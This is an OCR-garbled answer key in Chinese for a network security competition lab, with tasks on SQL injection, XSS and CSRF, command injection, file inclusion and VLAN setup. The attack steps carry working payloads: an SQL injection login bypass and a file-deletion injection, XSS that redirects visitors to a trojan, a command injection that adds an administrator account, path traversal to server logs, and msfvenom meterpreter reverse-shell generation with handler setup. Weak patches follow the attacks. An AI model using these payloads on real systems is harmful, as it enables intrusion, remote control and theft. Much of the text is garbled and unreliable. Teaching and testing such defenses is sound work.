




下载本文档
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
任务1:SQL注入攻防〔55分〕1.We昉问DCS种的WebServ2003效劳器,进入login.php页面,分析该页面源程序,找到提交的变量名,并截图;〔5分〕找到源程序:〔2分〕23<tltle.LogLnitle>dhttp-equiv-^ciorite-nL-Typc-**oocnte-nt/ht■!rclia.T5c-t-ut6</h&ad^9<body>Loq|iii</hl>I'd''CujchlHuLlAm«EJL.In苴uLLlwulhodH^pu-ift?r>IIIflJWj:<inputt国t'-nsnriiB^/X/br>"5Password:Cinputtype--■paname-irpasswri1G<lu£>uttyfj=t-■'sliJ-n¥<1ue-'"SuJjbJ.t^/>fttibsptiiLsp'dijijpuittype—■'x^se_nv<1ue-'"Rt;Het",/>||itc/rati'in19式/bod产20学口页面标题:<title>LoginPage</title>找到提交的变量名〔3分〕提供以下变量:name="usernmname="passwd.对该任务题目1页面注入点进行SQLft入渗透测试,使该Web站点可通过任意用户名登录,并将测试过程截图;〔5分〕Usurname:anyPassword:any101r100=100构造注入语句:username:任意用户名password:含:orX='X〔X为任意值〕〔3分〕同时包含截图:1、通过任意用户名登录〔截图〕2、登录成功页面〔截图〕ItB.1.^U^/success-php-Mi文件电渐后通歪看炉的书中工具⑪帮用.、退、.回曲小/速索炉七⑤Mtp://192.166.l.Z32/5ucct5=.phpLevinSuccess\E「.t二i~T上匚Web〔2分〕.进入DCS伸的WebServ2003效劳器的C:\AppServ\www目录,找到loginAuth.php程序,使用Ed让Plus工具分析并修改PHP源程序,使之可以抵御SQL注入,并将修改后的PHF®程序截图;〔10分〕3useinarne=$GET[+usernm'|;$paS5WG>d=S_GET['p^swd'];$CQim=ms5qlconnect,1270+0.1";'m7'roof);iff!$corn)(ConnectFailure</brmssq|_$elactdbCusers'$conn)orexhCDBSelectF4ilur«</br>);$sql;selectpasswordfromurrswhereusername=FSusername"";Jres^msscjLquerydsql.5wriniorexitf'DBQueryFallure</br>P);W(S□bj=e5sqLfetch_口bjeet(S『es)乂if($obj->password==Spdssword){he^defCIocationsuccess,php);)edi.Passwordiswrong';h—derf"R而一一1:卜:url=:/71/f»ilur£phimRls«(echo"UsernameDaesNatExistheader('Rgfiresh:3;url=y^—j/f新山『孰phpr);](10分)包含语句:selectpasswordfromuserswhereusername='$username'if($obj->password==$password)4.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCS种的WebServ2003效劳器进行SQLS入渗透测试无效,并将验证过程截图;(5分)同时包含截图:1、通过任意用户名登录(截图)
2、登陆后,页面出现用户名不存在提示;〔截图〕文性Qr编更却查看5收霰凶TMqj增的鱼।nk-Llh.pgUsernaioeDoesNotEkist〔5分〕5.WetO续访问DCS外的WebServ200阴艮务器,"/"-^Employe5.InformationQuery",分析该页面源程序,找到提交的变量名,并截图;〔5分〕找到源程序:〔2分〕
1?3丁h&nd;-3<tit/titls>5<wBtahttp-10£[11.1?=^cont-ent-1ype'Jconten.text/htmil;char:Eet=utf-H6</headD>7D<Jbody>“已lupLiilEMpJxiy也量U客"工ZU]>10Cforillxrt10i1kqQunryCtrlBphpWhcHl*1pq|fttn>11rrs^jnantf1!:<lnputtyp/—“土产比七**hait-*pi।riiiim1?<inpiit十yp^t-rVfl1;i^—^smhmit/>£nhspfcnhsp<inpu]ti_ypf^Lr^与2trwa)ime—~13</for«C>►14</brXahrst=slisi,htmI->-CoBack</aX/br'5]15</body>1G17</htmr-*Q『1jiiJ找到的源程序含有页面标题:<title>Query</title>找到提交的变量名〔3分〕name="usernm"6,对该任务题目5页面注入点进行渗透测试,根据输入“%以及“〞的返回结果确定是注入点,并将测试过程截图;〔5分〕Uuftulfii*:%wi<j■Uuftulfii*:%03,.画H;.**—划j昨川|舟―13MxlHBV:y%»d«■sneryuedajntaai1lyuedriKdc.<unT-LFliW?EF7■电蟒两?33□cerr^Eif-:)ii^eiftui3tlidHiMw.ev4TeL:ciiff7Tan^3口serTiSDe.sjzi^jaEiRn»mHHmLml]Bimqii・・hUte"tTei-fliwiwr?iO'IfibLlc:口的聒织胡(2分)
Wti■♦簪X*«k*li(|■■堂弟■呼Wti■♦簪X*«k*li(|■■堂弟■呼1As*6吨Uwirn-ahriie:「旬产1前・4>KaK:TWiddiLUwU-jw4sl«J6m】;910EEJTF■hzUK"」luWLH4K;li^ciLukiII或yitstiLkcri:miiaioEEn司8卫Enune-Rfmvi(Case:r>j>iuanRmilmumfefiimTmulEWF输入";,返回所有用户信息〔截图〕〔3分〕7.通过对该任务题目5页面注入点进行SQL注入渗透测试,删除DCS种的WebServ2003效劳器的目录下的1.txt文档,并将注入代码及测试过程截图;〔5分7.构造注入语句:‘exec'delc:\1.txt'--〔5分〕8.进入DCS伸的WebServ2003效劳器的C:\AppServ\www目录,找到QueryCtrl.php程序,使用Ed让Plus工具分析并修改PHP源程序,使之可以抵御SQL注入渗透测试,并将修改后的PHP源程序截图;〔10分8.截图:在效劳器场景QueryCtrl.php源程序语句:$keyWord=$_REQUEST[usernm']之后参加:5keyWord=addsl3shes〔$|ctyWord〕;SkeyWord=rtF_repla«〔T,%",T,\%",$k*yWord〕;4kfiyWord=StrreplaceJi\$ksyWord〕;〔10分〕9.再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该Webserver进行SQL注入渗透测试无效,并将验证过程截图.〔5分〕通过:‘exec'delc:\1.txt'一再次进行SQL注入截图;系统出现错误提示:BadKeyWord〔截图〕〔5分〕BarnLng:as3q〕_oiEry1;〕[fimrtlniLiKBqlnjgM:陛羽电里二第1行:丁附亚弯谭涉绯L〔severity闾5.二胃中施汗匕—"但用工]-.^^lineIT・arMmg;自qL,事ery〔l「fuibn■信:口1型屋门];fitldln«C.\lwSBi^\™\fliuitnCirLphpmliiwITrarjii£i«:K5'j]_Etii;hL0fciKt〕:wHiedliCJt打mi日^olliESfll-jfiult1修dothioC:U|M^s¥\iiBi^flucnCtrL^&nIm13Bad■&心kGigJV任务2:XSS^口CSR股防〔65分〕
1.We昉问DCS外的WebServ2003效劳器,"/"->"Employe1.MessageBoard",分析该页面源程序,找到提交的变量名,并截图;〔5分〕找到源程序:〔2分〕1113<tltla»leBsageBe也nd4,七工tl心?CmtA-«qaiv="Mnt»nt-Typ«"conient®r*text/html;charutf-6</hsAci><hl>Enploye«MessjigeBoar£K/hl><fS/鼻©tg语〞总“M.php"WithCi牛、8tBUnaiM!<lnputtype="teiCf1n力三1'Ecs133g君Usernainc/X/br>9Nessage:</br>10<textarear©忖导="1仃"cols=rr50"Jian〕e='message_X/textareax/br>11<inputtype""sub<rlt"Bvalue»t/>S:ntosp <1nputtype^^reset"■vfllue""Reset,n/>12</£omO13</htrnl>14<?php15echoH<7hrX国hjeef=Dlspla^fcL^ssagft.phph>Displayuesoage</dL>R1;--T>含有页面标题:<title>MessageBoard</title>找到提交的变量名:〔3分〕name="MessageUsernamename="message"2.对该任务题目1页面注入点进行XSSt透测试,并进入"/"->2.EmployeeMessageBoard"->"DisplayMessage"页面,根据该5分〕页面的显示,确定是注入点,并将测试过程截图;5分〕构造注入代码:〔2分〕<script>while〔1〕{alert〔"Hacker!"〕;};</script>测试注入成功:〔3分〕3hi1尸;门I1日,Lglitdrfltn.宕IE■/卢;提小岫夫赛'方,丁■司»立打|寓121,11mllp:小I峥CommunicationMessage弹出alert〔"Hacker!"〕括号中的消息;3.对该任务题目1页面注入点进行渗透测试,使"/"->"Employe3.MessageBoard"->"DisplayMessage"页面的访问者执行网站〔〕中的木马程序:,并将注入代码及测试过程截图;〔5分〕构造注入代码:〔2分〕<script>location.href="";</script>测试过程:〔3分〕
CoMtnunicatiotiMessage名称:trojanhorse.exe发送者:4.通过IIS搭建网站〔〕,并通过Kali生成木马程序TrojanHorse.exe,将该程序复制到网站〔〕的WWW目录下,并将搭建该网站结果截图;〔5分〕Internet信息效劳:网站目录下存放:trojanhorse.exe搭建DNS〔1分〕
333便jKj333便jKjrxji蹄与二五〞工修司用・9步氮〞.必1名H用■一士叫闺[JKWVHdUM—・■iJu4KkaiisrgI■000^It*Lfl.J正向查找区域:主机〔截图〕Zone:Org主机:hackerMetasploitFramework:TrojanHorse.exe生成〔3分〕root@bt:〜#Ifconfig〔截图〕显示KaliIP地址:root©localhost:-J*insfveron-pv.irtdwiiTeterprater.rflv«rsfl_tcplhost=1Q13LPWT-8Q-fexe-otrojanhorse,e>terjoplat^arrv.asse'ected,choosingHst::^odjIe::PlatTorn::'LMndD<'sTromiihepayloNoArchselectingArch;xBGfromthepaylcaJnoercoderorbadcharsspecifled»outputtingra〞payloadPayloadSize:293bytg5a\cd心:_tf'ojirihcrit,ext截图包含:root@bt:~#msfvenom-pwindows/meterpreter/reverse_tcpLHOST=LPORT=80fexe-otrojanhorse.exe5.当"/"->"EmployeeMessageBoard"->"DisplayMessage"页面的访问者执行网站〔〕中的木马程序TrojanHorse.exe以后,访问者主机需要被Kali主机远程限制,翻开访问者主机的CMD.exe^T令行窗口,并将该操作过程截图;〔5分〕(2MetasploitFramework:HackerReverseTcp连接客户(2分)root@bt:~#msfconsolemsf>useexploit/multi/handlermsfexploit(handler)>setPAYLOADwindows/meterpreter/reverse_tcpPAYLOAD=>windows/meterpreter/reverse_tcpmsfexploit(handler)>setLHOSTLHOST=>msfexploit(handler)>setLPORT80LPORT=>80msfexploit(handler)>exploit[*]Startedreversehandleron[*]Startingthepayloadhandler...(截图中包含黄色局部)访问者主机需要被Kali主机远程限制(3分)KaliMSF提示(截图)包含如下信息KaliIP:访问者主机IP:[*]Sendingstage(bytes)to[*]Meterpretersession1opened(->atmeterpreter>nrf#xplstrrhardler)>SKpldr*Startediteyerieband1eron1'92.1.6S.1,.213;SOT5£*「£ii「gthipaylQdd卜5寸・「一**1Serdingstage(EaSfiKbytes1to192„16B.1.211>]^Merpr«ermssHoh2openedLZ13:«0/H2+lflS,1.211:1302)就2021-05-05l&:n:59fOSOClKali截图包含翻开访问者主机的CMD.ex喻令行窗口;工•上trpmr»ihtllProcess9-SUcrcited.Clldiinr#11仃赖工他产寸匚「七口十七wirdosxP[不主5B1.2oOJ](C)曦工产TT1945*1-icrosoftCorp»G,.gc/MEJird"Hr审ystr,医■.进入DCS伸的WebServ2003效劳器的C:\AppServ\www目录,找到insert.php程序,使用EditPlus工具分析并修改PHFW程序,使之可以抵御XSSt透测试,并将修改后的PHF®程序截图;〔10分〕〔10分〕在效劳器场景原insert.php程序语句$info=$_REQUEST['message]后参加:绿色局部,通过替换函数,通过其它字符({},(),[]等字符)替换字符“<〞和“>〞均可得分;$info=str_replace(“<〞,"(〞,$info);$info=str_replace(“>〞,")〞,$info);或$info=str_replace(“<〞,"{〞,$info);$info=str_replace(">","}〞,$info);或$info=str_replace(“<〞,"[",$info);$info=str_replace(">","]〞,$info);.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCS种的WebServ2003效劳器进行XSSJt透测试无效,并将验证过程截图;〔5分〕金]总4—L——J7:沙[ikQM15m小小〞.而~memjComnunicat1onMcssagcFoBllHfPerMn"mi&MIP:IJPujlin*Tinr:1S-10-SI0TLAS1£6Pl口电1EtcIe曰吕也由亡CmtEni:(scrxpOi4iilc(lMilerl3r(AcripOSQLServer企业治理器中,Message表中info字段注入语句符号“<〞和“>〞被替换为上一题替换后的字符;同时CommunicationMessage页面显示Content:注入语句符号“<〞和“>〞被替换为上一题替换后的字符;〔5分〕.Web^问DCS外的WebServ2003效劳器,"/"->"ShoppingHall",分析该页面源程序,找到提交的变量名,并截图;〔5分〕找到源程序:〔2分〕1Kta*<*tvE-af=11iT^&T'QcwiCDrphp-?^a4d!F=k»^bQaEd££|uantIt-y=l'>JLa^te«a.r^i^iap£inbsrp£nti-9p]i3fB:100.Og/jiXZb假设A,,4k!»t,<*hTiit='ShopplngFx^c«E£.php7gcadEF=raQLLM£q^Mntit-y=l!Mfcnjs«-&rb5p fanbspjU^£,9-0.D0</AX/13E>-'r^1■£!»m<Bhc*r='Inq¥rK«sp.php'*go4d?=ne>n1t«r£>q]untlt^=l•制1011;1{4>“通用6滴叩&曰叩的111;5..4#<311下也[:;>叮»chg>*<*15hQpp]kr^PEQC«:*«-php?^wa»-cpikU^*rtti,ty*la>crB4hfc<fp£4ib«^«j)bf^wfi.i0Oi^/be.7hM*<*heft9事g*9J3f4MiM・:pHp?qx3nHKEyfiquM^"E1MWry<*«pdbqpCrib,nB;M9.OQK/ix/bE^'!?tecMy5Shopp1n^Frwa»「php?g»d-r>"dv4xcMqujTitLt『3l1RVDRWfi*:J#0.,*tKfax/br>":k£»'X/brX/brX/biX/tirXMsrXahze£«rlist.iitml7>3<iEac^/aX/b^^jT0页面标题为:<h1>ShoppingHall</h1>找到提交的变量名:〔3分〕goods=keyboard&quantity=1goods=mouse&quantity=1goods=monitor&quantity=1goods=cpu&quantity=1goods=memory&quantity=1goods=dvdrom&quantity=19,对该任务题目1页面注入点进行渗透测试,使"/"->"EmployeeMessageBoard"->"DisplayMessage"页面的访问者向页面ShoppingProcess.php提交参数goods=cpu&quantity=999999,查看"/"->"PurchasedGoods.php页面,并将注入代码及测试过程截图;〔5分〕构造注入代码:〔2分〕<script>document.location=".X/ShoppingProcess.php?goods=cpu&quantity=999999";</script>WebserverIP:测试过程:〔3分〕ShoppingCartTotalAJiourrris的的切口do截图:GoodsCPU数值大于或等于99999910.进入DCS伸的WebServ2003效劳器的C:\AppServ\www目录,找到DisplayMessage.php程序,使用EditPlus工具分析并修改PHF®程序,使之可以抵御CSRF>透测试,并将修改后的源程序截图;(10分)171£(*jCO0KZI<|vUMCmtf13-riiue)1IBhr«fa11MlMtitesMQtMesaag«</«x/bE>)19//echo'"Ccintexitstriptagst"串曲1->工比0叱)jyFbrx/bEX/lfeExrHTX/tEX/tgH:加ecto"Content:-^abjr>^fov.^/br>cfbr></b!^/bz>=:/,lbE></'th>";Kho>echs4X/tJible>'+JXechoy『bx>Shref='ttes&a9eBoArd.phpP>bp!lojfisatteg&gQBmeAC/aX/bi>1*;2&7>截图:效劳器场景DisplayMessage.php程序语句:echoaContent:".〞$obj->info"."〞替换为:echoaContent:",strip_tags〔"$obj->info"〕.""〔10分〕11.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCS种的WebServ200:B务器进行CSR■透测试无效,并将验证过程截图;〔5分〕〔5分〕得分点:直接显示代码信息,而不是将代码执行;〔截图〕SQLServer企业治理器中,Message表中info字段注入语句含有标记<script></script>;同时CommunicationMessage页面显示Content:注入语句不含有标记<script></script>;任务3:命令注入与文件包含攻防〔50分〕1.We昉问DCS外的WebServ2003效劳器,"/"->"DisplayDirectory",分析该页面源程序,找到提交的变量名,并截图;〔5分〕找到源程序:〔2分〕,12:iC:\*■4-ntvnt-Tapw11ccnt«nt=rTt4xt/htinl5C;\TsDlrftttory</hl>ormactior^'Tispla^OarettorYCtr1.phpJ,methad=■hqetr,>EC:\1sDirectoxynputtype=FrteMfiwina=dicecto=yF,fx/t>x><lnput-ype=risLlbni^t"-『尊二⑪声submif'/?&nitiSTiSnhsp<inputtype=''res:et"value=ResetpV>1011</htna>1213<?php14Kilo"</br><*href*"1i«t.htnilEack<?*></br>**j15?>页面标题:sDirectory</title>找到提交的变量名:〔3分〕name="directory2.对该任务题目1页面注入点进行渗透测试,使页面DisplayDirectoryCtrl.php回显C:\Windows目录内容的同时,对Webserver添加账号“Hacker〞,将该账号参加治理员组,并将注入代码及测试过程截图;〔5分〕注入语句:〔2分〕WINDOWS|netuserHackerP@ssword/addWINDOWS|netlocalgroupadministratorsHacker/add测试成功:〔3分〕截图:,ErI♦://L9Z.IflkI.7DZZ*U>J*.!>工ecc4■1师7itlreelm.它〞0国曲©>距二1一ewm赵:Lhitp...1ft'li3ZE7D.i«t«51£“吊11电打*,770・耐1*15就同妣他中吧3“山十#1|7〔1"目谢由争依曜度忒争DjjkL睢d项jr£typ含有:命令成功完成.3.进入DCS伸的WebServ2003效劳器的C:\AppServ\www目录,找到DisplayDirectoryCtrl.php程序,使用EditPlus工具分析并修改PHF®程序,使之可以抵御命令注入渗透测试,并3.修改后的源程序截图;〔10分〕F1***$vnj,t*ujut,j>:ftwrMvn«r法5〞下蚓「口?|/£•:[:•,Mn廿二万」引?…,**/../•,_J二T川片内।二口JEl元一.—2---J—1-i*—'1-j—=,r=丁=,i—J—1ic7*17$dir*t:tor^$_r^»cT[-direetorY11;letstr='\•f19iffctrctc〔$dlt*ct0FV,fetrj=t«l|20IE〔!ei^t^Ft9di±edt6izy〕〕I21«choypz>〞;22systemp'dli/wc:\\",^dlr«ctory〕;t3echoF『pt:士〉r24echo™<n>rK«iliTet=FCiEpl«Yl>l.r«rtQry.php'>Displ«Yc;TeDiiectQiy</ax/bi>'';2S26lelsa^27echo;29syfltBiat^dlr/w;3$eohoJQMhoybG门〞“«nt«ithadlractacynnna!M/bA叮31echohref-FDifplAyl>lr«t0ry-phpT>Diff|>l*YC:*»DiEectoty</iiX/6r>,';g\33Blse〔J4inputi*1〕;〔10分〕包含语句:$str=’|'if〔strstr〔$directory,$str〕==false〕.再次对该任务题目1页面注入点进行渗透测试,验证此次利用注入点对该DCS神的WebServ2003效劳器进行命令注入渗透测试无效,并将验证过程截图;〔5分〕截图1:利用注入点对该DCS种的WebServ200阴艮务器进行命令注入渗透测试;3DisplayC:VsDirectory-licrosuftInicruet文件旧褊蟆口查看建〕收藏®工且⑦帮助皿o后退▼©▼回国心户推案☆硒夹‘代之1681202/DisplayDiirActor/phpDisplavC:\fsDirectorvCVsDirectory:^HackerPasswordf型]Submit]Reset含有本任务第2题的命令注入语句;WINDOWS|netuserHackerP@ssword/addWINDOWS|netlocalgroupadministratorsHacker/add截图2:页面出现非法输入提示;含有本任务题目3修改后代码中的错误提示信息;本案例提示信息为:illegalinput!.We昉问DCS外的WebServ2003效劳器,"/"->"DisplayUploaded'sFileContent",分析该页面源程序,找到提交的变量名,并截图;〔5分〕找到源程序:〔2分〕1chffanl>1MKm*4<meta-equivsr-content-TipencontentsPrtext/htblL:chaiEet=utf-Sr,/>&</twac!>.<kiX>Dlgpla^iTpladdedl'bfileContenE</hl>■i<fo»actlor^4rDispliyr11ectxl.php,pMtho^agatpp>{Wttplo-«d«d4efilsFullPath(Bg.yuaidi/uploaid*dfila..ta±);<inputtypi=^tnKt1f门=〞E:1m同mb9<Inputtype■“西iib«Li1L〞vailueaJSiLbinif/>^nbsp1typ*«-reeet'hvaltifi«-et-二.</£on^<rhtal><?phphsy,birx*hr-f='i:L;rt,Mfta-GtoBack</ax/i&o^;*>页面标题:<title>DisplayUpload,sFileContent</title>找到提交的变量名:〔3分〕name="filename"6.对该任务题目5页面注入点进行渗透测试,使页面DisplayFileCtrl.php回显DCS伸的WebServ2003效劳器访问日志文件:AppServ/Apache2.2/logs/access.log的内容,并将注入代码及测试过程截图;〔5分〕构造注入代码:〔2分〕..\..\..\AppServ\Apache2.2\logs\access.log回显DCS种的WebServ2003效劳器访问日志文件:显示出AppServ/Apache2.2/logs/access.log的内容:〔3分〕
格衿口交营出收位㈤W〔HQ后遇.)W图G「群-m嶷宫,/格衿口交营出收位㈤W〔HQ后遇.)W图G「群-m嶷宫,/宣力M:.|;I•hup』理921跄1ma/IhiLpl编中L、式ItL*旃仁1址53整m.聋¥127ap-2vETl^SE^E2F«cfl;E.1z-?=121.U.U.L--[NTFflhW加L交小MST32T.O.O121,oBnKIO.uI7T.I10J2T-0.012T.0.fl]2i-□.a]2T.0.(J12T.0-(l血Q.O127.0.0]21.0.0392.108t--|^W2C>LCe2]e02xO1-[3VW/2O16:^:D3:B1L--|2172」却也如期我I--泛T/MMHS*阳*Dd*4*I--[2PrFlM/2CL6:E3s05:59t--(2T/ffar/20lfi:?3:De:58[一一i2T,--«air/2DLfi:23:D7z204的口10]■O8M]4DSDE]-KJ80IE]4IM00]十照口口】■+fKOIFl■+B3DEJ飞E1FET"GET■CEI/H'TTP/LL*2Dtl2SZ八Ml+口加Sn?/Llrt200L2B/tejrt.phpMIF/L]A2DD施/HTKrl"・201252/加皿曲pHin^Ll*3004网L--|.2T.<H^/2DL«:2]:01::29^0(i]■[2Wftr/2OL0::BJ;O3;3a4(0001L--腹TEw/aomZ扪阳;凿4■慎我]1.——131gH2fiL也盟:期铝制创扪I--12T,N>r/2OLG:麒1:口及28;加阳口喘]92-]58.L.LZJLJ霹--[21/]far/2Dlla23EWH4*OBOD]丁QM/'iQKinlutJr..phpMITT/LWN3"GET/succesf.prfi/Llr20014*POST门睢:LThBaithph?IHTP/IL-L*3DS3%BI小脚燧登中TIP〞•广2WM7Q9T/xinEthgKT7P/I.L'3023YE1心ucEE.phpHlWh200M节0门/loein^fflh.phjmTP^LLr3023tBT,1UEH■人加1T1F/1.]rEDOIN192.1«.LLZ4J9之】斶192.3A819工,]品L1冤--Lt24--LL网-19工Itt.L.124--J92,158392.】㈱LIE——L1a3--咽阕J+L别--is?.]sa.i.i制-592.1%匚1型--J92L1GTL1M==[Zr/H*T/2lDiG=23e09:43+OE匚口][SVJI^I/2D1fl:2J:09i52+DB&D][21/lter/fDlla23E(»GB2*0600]+OBOD]【绯触"201次典UhBF+C6C1O][2VAfez/?Dlf:2]:H:B7+OBM][2Vfcx/20iCa2JU]E5T-H)BU][2-/ll:ir/2DD£-231]-BS-HDBDD]+OBN1][2VHar/?Dlls?3HhSS+ABOD][n/hr/feDlfi:73s12:0+OBDI]I[21/)tel/2Dl!8:2Jsl2s23+CEED]l7VJter/aDll!21!MeU4CDD0]*GET/HTTF/1.「200252*GET/Lo^in-phpErnp/LIdTDDQM飞WnnurMju血>HITFJL-302J'GET/wccejs.php“GET"第T*GET"CET1-77二二二*GET"GET二号二E.php/sujdce三旧,jhp/SUteras,php岛口Mzaurcts's.php/Eucce2s'i=hp/succeEB./SLicrryy,php"GET/succesE.phg*get/mrp/i..r:HTTF/l,L/Lt*/l.I*HTTF/l.rRTTP/1P/LL*E1TF/LTHTTF/l.rHT7P/1,tr如口:00ZDQ2002DD到口20n20DJDO丸口EDDHjq14相IT3414】qH192.]tf8iL12d--ifiui圜.I」霹-392L1®.L12a--"盘1髭J“加4.392.]sa.IJ蔚,"<」骅」/案--】皱-i*.L-LA4——392.10B,i.iaa-■■192.]tf8iL12d--ifiui圜.I」霹-392L1®.L12a--"盘1髭J“加4.392.]sa.IJ蔚,"<」骅」/案--】皱-i*.L-LA4——392.10B,i.iaa-■■】见]63.LL&——192.1S».LILS-=[25/Jtax/2Dlli23&M£50+OBDO]l2Vlfar/^)18323;16:dn+CBDD](2V1Ibz/2D1IG=2^=15=03+OBQD][aiHkr/iDiiiaaiiaiu+obod][rr/!tax/^Difi:2]H€Eia*obdd][2VIfci/2DJ652J;l6;(S+ABOT]i2VlW加[4厘斯!T±3tmiu/SDlfiaaOslTaOa+OBDO][21/1for/701li23iJTF(n*OBDO]:[ZT/n*r/ZDJfi;23;n;ns-KIBDO]【2X%)a)W:23〞力州+OBM]*PQSTA^inAutkphprfTTP/l.3Q2"GETZsutces-Bid)ujHUF/l.T?D0M*CET/UrtT/i.r就.2K"GET,工gi±u限EaW].lF£DD4四"POST/Lr-fi^AwKphpBTTP/t.UM2"GET/sLirrcm.php/l,.ZDD144GETJ/l.r30021s2InternetExplorer地址栏中须含有:DisplayFileCtrl.php?filename=7.进入DCS伸的WebServ2003效劳器的C:\AppServ\www目录,找到DisplayFileCtrl.php程序,使用EditPlus工具分析并修改PHF®程序,使之可以抵御文件包含渗透测试,并将修改后的源程序截图;〔10分〕6-f[p£3dlciHJMa4j/客¥七工=er―gif(strstr(@£11nnain-.$sTe)=2.1s«.I(iiri,■腥Ey(ifiiiinuMnI■rho"中唱叱,:14vcho收fpr"-:TOC\o"1-5"\h\z11«ch£F"y/b片hr*C^hDLflplLl«a+>DiV|>lM<dM+»F<CenlrtnK.r1313)«lw(ittctw;"EnwrThtvplaided'*riltfullj15eeteHF</bE-xaH±±f・*ti±sjpJL占fP±L-.php〞力3*邛.&甘si^llacqeie.amt<^ax/bo11'1*ir71BBata"Zlle^aJ.uiput■wjIIschciF/bEX・hx«f="AisplayFlie.php"(>£11Eplxy3plDAd*<lr£Fll«Coat*Qt</aX/br>Bi;如«antb;〔10分〕包含语句:$str=;.'if(strstr($directory,$str)==false)8.再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该DCS神的WebServ2003效劳器进行文件包含渗透测试无效,并将验证过程截图.〔5分〕截图1:利用注入点对该DCS种的WebServ200阴艮务器进行命令注入渗透测试;输入框含有本任务题目6的注入代码:..\..\..\AppServ\Apache2.2\logs\access.log截图2:页面出现非法输入提示;含有本任务题目7修改后代码中的错误提示信息;本案例提示信息为:illegalinput!〔5分〕任务4:数据窃取防护:二层攻防〔45分〕.将PC1Kali所连接端口戈ij入与WA同一VLAN〔VLAN1Q,并将PC1Kali分配与DCS田艮务器相同网段IP地址,使PC1Kali、DCS种的WebServ2003效劳器能够在同一个网段〔VLAN1Q内相互Ping通.〔2分〕截图:PC1Kali、DCS洞在VLAN10〔#showvlan〕5C5O-2S(fc4)(lDrftg-v1nlO)vl,L阳NanfrTyp*MediaPorts1dctaultStaticEMETCtherntTl/O.5ttncrncti/o;/Ethcrnetl.-'O/OEtherFl'011Ethernetl■■'O13Ethernetl/0’15Ethernet1/0/17Fthfrnptl/O/Hi-rhernci1/0/21tthcrn@tl/0/23Lthflrn«L/0/256thsrn51/../CthernetL/0/6crnernetL/o/feEtherretL/0/1QEtherretl/O71?Etnerretl/O^l4EthernetI./0/16Etherii«tL/O/ISFth^rrfr1/0/7'0EthtrrerL/C/;?tthferf«!L.L/0/24trherretL/o/2titTh«rr«iL/0/2310VLAM0Q10StaticEM£TMIUSfiSD2S(R4)(CDrfiavlanLOj*EtherntTL/0.1EtherntTl/O/JEtherretl/O/JEtherrctL/O^VLAN1〔J^包含的接口数>=3;WebServerIP配置〔与参数表中效劳器场景的IP地址一致〕:2sSDoGiiim心m七吕<xndGcindnlrtis>ij^G-oiirxgfJindoijsIPConFigrupationEcheFnecadapter本地在:接2:Cnnn«rtdon-cpAtif1cDNSSufFl*.;IFHddf.5③=:192.1£Q,1.204SubnetMask*.*.*:DefaulcGaeevat/.-.:Ci\Docufncnta«ndSectin^asftdrti.nljtratar>HPC1IP地址配置〔与参数表中PC1的IP地址一致〕:C-\DocLimemtsandSettings\usei?>ipconfUindousIPGonfigu产ati*nEthernetadapter本地连接二Connection-speciTicDNSSuffix.:IPAddress:11SubnetMask..:Default:PC3IP地址配置〔与参数表中PC3的IP地址一致〕:
!1承川iI!Ii!Ir.I:"1fCDFlfigmthOLinkencap:EthernetHWaddr00:Ck:79;M;62:6c,znetaddr:132.16B.1.213Beast;192,16fi.L255Mask:255,255,255.0znetBaddr.teSO::ZOr:Z9ff:fea4:626cf64Scope:LinkUPBRDAtKASTHUMMINGMULTICfcSIMTU:1S00Metric:1RXpackets358errors:0drcipp*±d;Qoverruns:0fsane10IXpackets44prror^;0droppsd:0overruns;0carri-er:Qtollisione-DtiqueuEten:i口口口,RX.bytes:2^064(24.4TKbytes:7652|7.4KiB)loLinkeni:ap:LoizalLDopbackinetdddr;127.DD1Mask;25,d0.0inetSaddr:;;11/12BScope:HostUPLDDP日A匚qRUNTdIFJEHTUi65536Metric:IRXpackeitE.57errors.Qdl■口口,巨d:0ojerrljns:Qframe:0IXpackets57errors:0dropped:Doverruns:0carrier:0coll,isions-QtMqueuelen;0RXbytes:Z1713(21,2KiB>TXbytes:21713(21.2KiB)三个终端之间能够相互Ping通;-心nit吕mudGe七匕in>g[SSAidlnln±星七即a七oh〉士/仁邛山£1gindcvjs:IPConfigrurationEthetnecadapg»本地庄楼2.:CnnnflPtdon-eperifitDNSSuFf1*.!IPAddicta:1?2A£0.1.2e4Subnethas^*...:255_255_255.0DefaultGateua^p..«:3£\DacufticntA«ndCe4:tin^5^dinLniatrLfttoi'>-C;'^JX>cunontu4mdSQ't^in^s'^dnin192.l^S.1.211Pinffinor19?.1.1.211f/ith12nFflata-riL-121TTL=128rTL-128TTL-128RcplvFrom1?2.1riL-121TTL=128rTL-128TTL-128ReplvFrom11:b^tes=32time<lnsReplyFrom192^168.1.211:b^tes-32tine<lnsReplyFrom1724168.1.211:bytes力2tine<lnsPingstatiatic£for192.1&8.1,211:Facktts:Sent■4,Keceiued-4,Lost■UtMXloss>,Hjpproximditeroundtriptlme^inmilli-seconds:Hininun-Qms,H^xinum♦0ii£,Average■电msC:SDuuutmuHLMand8cLxi13aAliminisluyJ.13TTL=t4TTL=t4riL=i4TTL=64Pinning192.1&S.1.TTL=t4TTL=t4riL=i4TTL=64ReplyFi'Dffl192_1tR_l_213:bijtes=32tIne=2n-RepIvfrom192_1£S_1_213:bijtes=32time=lnsReplvfrom192.1.它8.1,2:13:hi/tes=32time-InsReplyfrom192.1£8_1-213::bi7tes=32time-InsPdngstatisticsfor192_1&8.1.213:Packet苹;Sent=4,FEecetued=4.Lost=SC0zlossAjiproximteroundtriptime辑innilli-seconds:Nininun=Ins,Naximunk=Zm假设fAverage=Ins在同一个窗口ping通除了本机外的2个IP地址;.查看DCR咬换机VLAN10勺MA电址表容量信息,并将DCRS交换机配置相关参数、查看命令、查看结果截图.〔3分〕#showmac-address-tablecountvlan10DCRS-5650-28(R4)(confmac-address-tablecountvlan10computethenumberofmacaddress….Maxentriescanbecreatedinthelargestcapacitycard;TOC\o"1-5"\h\zTotalFilterEntryNumberis:16384StaficFilterEntryNumberis:10384unicastFi1terEntryNumberis:LG354Currententrieshavebeencrearedinthesystem:TotalFilterEntryNumberis:Sind5v»dualFilterEntryNumberis:8staticFilterEntryNumberis:0DynamicFilterEntryNumberis:8DCRS-565O-2B(lt4j(conf1g>#DCRSfe址表空间中有可用的空